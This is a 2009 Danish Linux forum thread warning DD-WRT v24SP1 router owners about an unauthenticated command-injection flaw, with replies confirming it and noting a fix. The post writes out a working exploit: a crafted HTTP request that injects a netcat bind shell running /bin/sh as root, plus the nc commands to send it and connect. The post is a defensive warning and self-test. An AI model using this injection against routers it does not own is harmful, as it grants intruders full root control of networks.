• Opret dig
  • Glemt adgangskode

User account menu

  • Artikler
  • Forside
  • Forum
  • Nyheder
  • Log ind
Hjem
LinuxIN.dk

Snak med

Opret dig!

Af Anonym7 | 21.07.2009 13:20

Advarsel til DD-WRT brugere

Løst og fast
For nogen tid siden begyndte man at spekulere ikke i penetrationen af en persons PC men snarere de routere som vendte ud mod omverdenen.

Mange har fejlagtigt den tro, at fordi en router i nogen grad kan betragtes som en HW-firewall så er den hellige grav vel forvaret.

Nu er der så fundet et meget groft hul i det populare DD-WRT firmware:
http://www.milw0rm.com/exploits/9209

Kort fortalt:
Dette exploit benytter DD-WRT v24SP1 som er den nyeste DD-WRT udgivelse der er tilgængelig - vha. en række forseelser i firmware koden deriblandt:
1) Man kan sende kommandoer til routeren via nettet - uden autorisation
2) httpd serveren (som eksekverer kommandoen) kører som root

Står man altså i den situation, at en person i dit LAN kan overtage routeren fuldstændigt - ligeledes kunne en specielt konstrueret hjemmeside også resultere i at du (uden at vide det) sendte de nødvendige kommandoer for at åbne op til routeren udefra.


Ville bare lige advare andre der også ligger inde med DD-WRT routere da de har en vis popularitet!

PPS!
Jeg har testet på min v24SP1 router og det virker fint - dog kan jeg ikke umiddelbart bruge det mod min DD-WRT v23SP2 router.
Begge de testede routere er af mærket Linksys WRT54GL (selvom dette ikke burde have en indvirkning)

Test din router
Lav en ny tekstfil

GET /cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh HTTP/1.0
Host:192.168.2.2

Hvor 192.168.2.2 erstattes af din routers IP

Således åbnes porten:

cat evil-ddwrt-req | nc 192.168.2.2 80

Igen, erstat 192.168.2.2 med din routers ip

Således får du adgang til din root shell:

nc 192.168.1.1 5555


Som man kan se sender man simpelthen en forespørgsel til routeren om at netcat skal lytte på port 5555 efter forbindelser og eksekvere /bin/sh når forbindelsen oprettes - resultatet er at når du forbinder har du en root shell at lege med.

  • Log ind eller opret dig for at tilføje kommentarer

Kommentarer4

# 1

16 år 3 måneder siden

Permalink

Indsendt af Anda den 21. juli 2009 kl. 15:49

Permalink

Re: Advarsel til DD-WRT brugere

Et lille skridt i mod bedre sikkerhed er vel at sætte routeren til ikke at lytte på port 80?

EDIT:
Måske ikke alligevel - Legede lige lidt med nmap.
Hvad vil det sige at der er en filtered port?
  • Log ind eller opret dig for at tilføje kommentarer

# 2

16 år 3 måneder siden

Permalink

Indsendt af mich den 22. juli 2009 kl. 00:17

Permalink

Re: filtered port

#1
D.v.s. at nmap ikke kan afgøre, om porten er åben, fordi f.eks. en firewall forhindrer pakken i at nå porten. Se 'man nmap', 'Port scanning basics'.
  • Log ind eller opret dig for at tilføje kommentarer

# 3

16 år 3 måneder siden

Permalink

Indsendt af m_abs den 25. juli 2009 kl. 12:03

Permalink

Re: Advarsel til DD-WRT brugere

Jeg har lige prøvet det på min router mener den har v23sp2 og her virkede det også.

Tid til en opgradering. :)
  • Log ind eller opret dig for at tilføje kommentarer

# 4

16 år 3 måneder siden

Permalink

Indsendt af carlo den 2. august 2009 kl. 17:03

Permalink

Re: Advarsel til DD-WRT brugere

Bare til info så er der en midlertidig opdatering!!
  • Log ind eller opret dig for at tilføje kommentarer

Svar søges

Linux i KBH-event mandag den 17. November 0
Tid til at lære noget igen 0
TPM 2 0
BigLinux 0
Amerikansk tastatur på dansk tastatur 0

Seneste aktivitet

Skal vi være nervøse? 21
How to upgrade to LMDE 7 6
Kontakt til dansk-gruppen 3
Internettet er ved at dø. Vi kan stadig stoppe det 1
Nørder søger nørder: Første Linux-brugergruppe på Mors 3
Østrigsk ministerium smider Microsoft ud til fordel for Nextcloud 1
Brug carburetor til at forblive usynlig online 8
Sådan konfigurerer du flatpaks' flathub til verified only 9
Plasma tapet-skifter 3
Virksomheder og enheder der kører på Linux 11
NordVPN har udgivet kildekoden til sin grafiske brugergrænseflade 2
Flere og flere bruger Brave browseren 1
LibreOffice og Collabora: Hvorfor er de ikke i skolerne i stedet for Word og Google Docs? 11
Firewall igen 5
Værdien ved open source 2
Sailfish på android telefon 1
Ladybird Browser 7
Satiriske ordspil 3
Kan ikke boote på installation 26
Tilføj signatur til Evolution mail 2

© 2025 Linuxin og de respektive skribenter

Oprettet og drevet af nørder siden 2004 !